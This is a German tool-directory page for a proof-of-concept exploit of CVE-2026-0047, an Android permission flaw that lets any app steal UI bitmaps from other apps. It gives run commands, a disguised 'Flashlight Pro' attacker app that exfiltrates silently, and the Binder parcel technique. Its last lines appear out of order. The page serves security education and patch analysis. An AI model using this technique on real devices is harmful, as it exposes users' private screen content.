Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-0047-poc — CVE-2026-0047: Fehlende Berechtigungsprüfung in ActivityManagerService.dumpBitmapsProto() — UI-Bitmaps von jeder laufenden App mit null Berechtigungen stehlen (Android 16 QPR2 Beta) | Kitploit
Tools/GitHubGitHub/mobilehackinglab/cve-2026-0047-poc
Android-SicherheitPrivilege EscalationSchwachstellenanalyseExploitationInformationsbeschaffungMobile SicherheitLernen & BildungBinary-ExploitationLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubmobilehackinglab/cve-2026-0047-poc

CVE-2026-0047-poc

CVE-2026-0047: Fehlende Berechtigungsprüfung in ActivityManagerService.dumpBitmapsProto() — UI-Bitmaps von jeder laufenden App mit null Berechtigungen stehlen (Android 16 QPR2 Beta)

Repository anzeigen
134vor 3 MonatenNoch nicht geprüft

CVE-2026-0047: Fehlende Berechtigungsprüfung in ActivityManagerService

Heap von Bitmaps aus jeder laufenden App gestohlen — null Berechtigungen, null Benutzerinteraktion.

Eine fehlende enforceCallingOrSelfPermission(DUMP)-Prüfung in ActivityManagerService.dumpBitmapsProto() ermöglicht es jeder installierten App, UI-Bitmaps aus allen laufenden Prozessen auf Android 16 QPR2 Beta (Baklava) zu exfiltrieren.

Hinweis: Wir haben diese Schwachstelle nicht entdeckt. Alle Anerkennung für die Entdeckung und verantwortungsvolle Meldung gebührt den ursprünglichen Forschern. Dieses Repository enthält unsere unabhängige Patch-Analyse, Reproduktion und pädagogische Aufarbeitung, um der Sicherheitscommunity zu helfen, die Fehlerklasse und die verwendeten Exploitationstechniken zu verstehen.

CVECVE-2026-0047
SchweregradKritisch — CVSS 8.4
KomponenteActivityManagerService.dumpBitmapsProto()
GrundursacheFehlende Berechtigungsprüfung (CWE-280)
AuswirkungJede App ohne Berechtigungen stiehlt UI-Bitmaps aus allen laufenden Apps
BetroffenAndroid 16 QPR2 Beta 1–3 (Baklava), Patchlevel < 2026-03-01
BehobenAndroid-Sicherheitsbulletin März 2026

Inhalte des Repositorys

root@kitploit:~
├── app/                    # PoC-Exploit-App (Audit-Tool-UI)
├── attacker/               # "Flashlight Pro" — getarnte Angreifer-App
├── apk/                    # Vorgefertigte APKs (installationsbereit)
│   ├── cve-2026-0047-poc.apk
│   └── flashlight-pro-attacker.apk
├── exploit.sh              # Einzelschritt-Exploit-Skript
├── gradle/                 # Gradle Wrapper
└── README.md

Einrichten der Testumgebung

Sie benötigen einen Android 16 QPR2 Beta (Baklava) Emulator mit einem Sicherheitspatchlevel vor 2026-03-01:

root@kitploit:~
# Download the vulnerable system image
sdkmanager "system-images;android-Baklava;google_apis;arm64-v8a"

# Create an AVD
avdmanager create avd -n baklava -k "system-images;android-Baklava;google_apis;arm64-v8a"

# Boot the emulator
emulator -avd baklava &

# Verify the patch level is pre-fix
adb shell getprop ro.build.version.security_patch
# Anything before 2026-03-01 is vulnerable

Schnellstart

Option 1: Einzelschritt-Skript (empfohlen)

root@kitploit:~
# Full run: set up emulator, build, exploit, extract stolen bitmaps
./exploit.sh --setup-emulator

# Already have a Baklava emulator running?
./exploit.sh

# Skip build, just run exploit
./exploit.sh --skip-build

Option 2: Vorgefertigte APK

root@kitploit:~
# Install the PoC app
adb install apk/cve-2026-0047-poc.apk

# Open some apps (Settings, email, etc.) to have visible UI
adb shell am start -n com.android.settings/.Settings

# Launch the PoC
adb shell am start -n com.poc.cve20260047/.MainActivity

# Tap "Exploit dumpBitmapsProto()" button

Option 3: Angreifersimulation („Flashlight Pro“)

root@kitploit:~
# Install the disguised attacker app — declares ZERO permissions
adb install apk/flashlight-pro-attacker.apk

# Launch it — exfiltration happens silently on startup
adb shell am start -n com.poc.cve20260047.attacker/.MainActivity

So funktioniert es

  1. Raw Binder-Sonde — Transaktionscode #117 auf dem activity-Dienst wird auf dumpBitmapsProto() abgebildet. Das Senden ohne Argumente verursacht eine NullPointerException innerhalb von AMS (keine SecurityException), was beweist, dass der Methodenrumpf ohne Berechtigungsprüfung ausgeführt wird.

  2. Raw Binder-Exploit — Wir verwenden IBinder.transact(), um ein handgefertigtes Parcel direkt an AMS zu senden. Dies umgeht die versteckten API-Beschränkungen von Android vollständig — keine hidden_api_policy-Einstellung erforderlich. Das Parcel enthält:

    • Interface-Token (android.app.IActivityManager)
    • Nicht-Null-Markierung + ParcelFileDescriptor (Pipe-Schreibende)
    • Leeres String-Array (alle Prozesse)
    • userId = -2 (USER_CURRENT)

Ergebnis

Auf einem Baklava-Emulator (BP41.250725.007, Patch 2025-08-05) mit geöffneten Einstellungen, Uhr und Dateien:

  • 679,091 Bytes Protobuf-Daten
  • 63 gültige PNG-Bilder aus allen laufenden Apps gestohlen
  • Null Berechtigungen von der PoC-App deklariert

Wie es behoben wurde

Google fügte enforceCallingOrSelfPermission(DUMP) als erste Zeile von dumpBitmapsProto() hinzu, sodass unprivilegierte Aufrufer jetzt eine SecurityException erhalten, bevor auf Daten zugegriffen wird.

Referenzen

  • Android Security Bulletin — March 2026
  • CVE-2026-0047 — NVD
  • CWE-280: Unsachgemäße Handhabung unzureichender Berechtigungen
  • Blogbeitrag: Vollständige Analyse und Exploitation-Walkthrough

Danksagungen

Forschung und PoC von Mobile Hacking Lab. Wir haben diese Schwachstelle unabhängig zu Bildungszwecken reproduziert.

Haftungsausschluss

Dieser Proof of Concept wird nur für Bildungs- und autorisierte Sicherheitsforschungszwecke bereitgestellt. Verwenden Sie ihn nur auf Geräten und Umgebungen, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben. Die Autoren haften nicht für Missbrauch.

Tool herunterladen
  • dumpAll = true
  • format = "png"
  • Bitmap-Extraktion — AMS schreibt Protobuf-Daten mit PNG-Bitmaps in die Pipe. Wir scannen nach PNG-Magiebytes (89 50 4E 47) und IEND-Trailern, um einzelne Bilder zu extrahieren.